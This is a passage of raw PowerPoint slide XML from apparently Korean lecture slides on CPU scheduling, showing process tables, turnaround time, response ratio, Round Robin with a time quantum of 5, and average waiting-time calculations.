                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3934805529"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="746040" y="3079686"/>
          <a:ext cx="2744051" cy="1262236"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="760523">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="661176">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="661176">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="175131996"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="661176">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="460246715"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="200877">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P1</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P2</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P3</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P4</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707118">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" fontAlgn="base" latinLnBrk="0">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr 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898585991"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="166977">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8 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>시간</a:t>
                      </a:r>
                      <a:endParaRPr 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4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9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5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709973338"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="그림 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6204438-63C7-42A7-AA51-C9267587FC98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1690058" y="3424923"/>
            <a:ext cx="336684" cy="555269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5128" name="Picture 8" descr="Microsoft PowerPoint 2019 Icon">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815DC701-6E24-4059-806A-7C67275D98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15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A Custom Icon for LoL, Akali Main's Special : akalimains">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8772BC76-F02F-48A1-92A7-51A8ACF99C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5243" y="3441250"/>
            <a:ext cx="484020" cy="48402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71 Google Empire ideas | adwords, google, social media">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CCE504B-E245-49FE-BF12-4A923A268D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94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sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="화살표: 오른쪽 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EE2BA56-94E2-496F-B82B-66BF474B718D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1422218"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id="{EE2DE3A4-6F8F-487A-97C3-492BB3D189AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2118064"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화살표: 오른쪽 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{984BB91E-31FF-49B2-BB4A-892A52FAE9C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2767066" y="3159137"/>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7FE940B1-1493-4D9D-B291-F214C6E19825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2566489"/>
            <a:ext cx="2450259" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>시간 간격으로 실행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56" name="직선 화살표 연결선 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E31F342-276B-427E-B62C-4B4709C60824}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5018878" y="4876445"/>
            <a:ext cx="14646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7160E5A-DDC6-4A02-942F-352C4EEEDBA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6920863" y="4876445"/>
            <a:ext cx="132782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1320F1C-6AA5-4EF8-8057-AB2B8C27EBBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6483541" y="470946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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="직선 화살표 연결선 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77564140-2753-47B2-9D79-BD23A6FD01EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="64" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8275131" y="3509080"/>
            <a:ext cx="597411" cy="7820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A3CE849-5D15-4FBA-B7BF-4C8008C748AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7075547" y="3139748"/>
            <a:ext cx="3593989" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>P3 Process “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Service Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>” =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 17 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80AFC685-6C9D-4EBB-A3E6-B1A9140FA3CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3713885" y="6285882"/>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67" name="TextBox 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68CFAC04-4C0E-4BE3-9221-23C145D59532}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6554493" y="6285882"/>
            <a:ext cx="3506814" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(0+7+15+9)/4 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7.75 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47142631-1772-4179-9860-AD6C0B1D49B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6889712" y="5735318"/>
            <a:ext cx="5155909" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>P3 Process “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Response Ratio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>” = (9+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)/9 =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2.11 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="직선 화살표 연결선 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2162B232-4273-44C7-9210-2C3CC9AABFFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7139524" y="4844841"/>
            <a:ext cx="42303" cy="8904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CA4DF33-E0D3-438F-AD41-EC24B2C225E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5587906" y="3471698"/>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Turnaround Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>” =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="직선 화살표 연결선 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2986FDD2-5D2A-4F3B-BAA8-2C37107F8225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5018878" y="4068648"/>
            <a:ext cx="238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0F4D32B-D4A7-43DF-B120-3ED74ACE4535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7837810" y="4068648"/>
            <a:ext cx="21410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57A184B-D595-4DA3-BCB8-69341F033134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7400488" y="3901671"/>
            <a:ext cx="437322" cy="369308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="TextBox 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AF8DA75-D48E-4227-94AB-AD381611EDDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5710702" y="2749126"/>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NTT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>” =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>24/9 =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.66</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163750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31" grpId="0"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="41" grpId="0"/>
      <p:bldP spid="38" grpId="0" animBg="1"/>
      <p:bldP spid="50" grpId="0" animBg="1"/>
      <p:bldP spid="51" grpId="0" animBg="1"/>
      <p:bldP spid="42" grpId="0"/>
      <p:bldP spid="58" grpId="0" animBg="1"/>
      <p:bldP spid="64" grpId="0"/>
      <p:bldP spid="66" grpId="0"/>
      <p:bldP spid="67" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="46" grpId="0"/>
      <p:bldP spid="49" grpId="0" animBg="1"/>
      <p:bldP spid="55" grpId="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62720A30-66E9-4F99-B869-A955855D0D4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886050" y="1845270"/>
            <a:ext cx="6498918" cy="1460891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2418235E-BF72-4520-B9B9-5BBC0373D3AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3763235" y="3429000"/>
            <a:ext cx="4665529" cy="2956176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="직사각형 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68D2FF11-30D1-4383-9185-115A61AA63FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5574566" y="3902947"/>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6" name="직사각형 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8AF7BEC-D2C3-41B9-B561-62612DCF4962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5574565" y="4681806"/>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7" name="직사각형 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE813CFF-3343-4AB0-9C54-3BCFC20C1C8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5574564" y="5372943"/>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8" name="직사각형 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9C7594B-450C-46E0-8C8E-39479F54EE4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5574563" y="6117970"/>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9" name="TextBox 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{950B235A-8063-446F-8374-5C89A496A7AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580444" y="3628600"/>
            <a:ext cx="2791753" cy="1285288"/>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RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Round Robin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>- Time Quantum = 5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="TextBox 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BA136AE-C3E1-4602-869D-B4DB16EFD8D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8819802" y="3982654"/>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81" name="TextBox 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1BAC6DA-AB04-4A3A-B47D-FB4315698C98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9073050" y="4491076"/>
            <a:ext cx="2822875" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(14+4+15+11)/4 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="TextBox 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E24D1C9-0251-44D3-A687-10700BFB22F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386765" y="1614806"/>
            <a:ext cx="4919181" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Context switching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
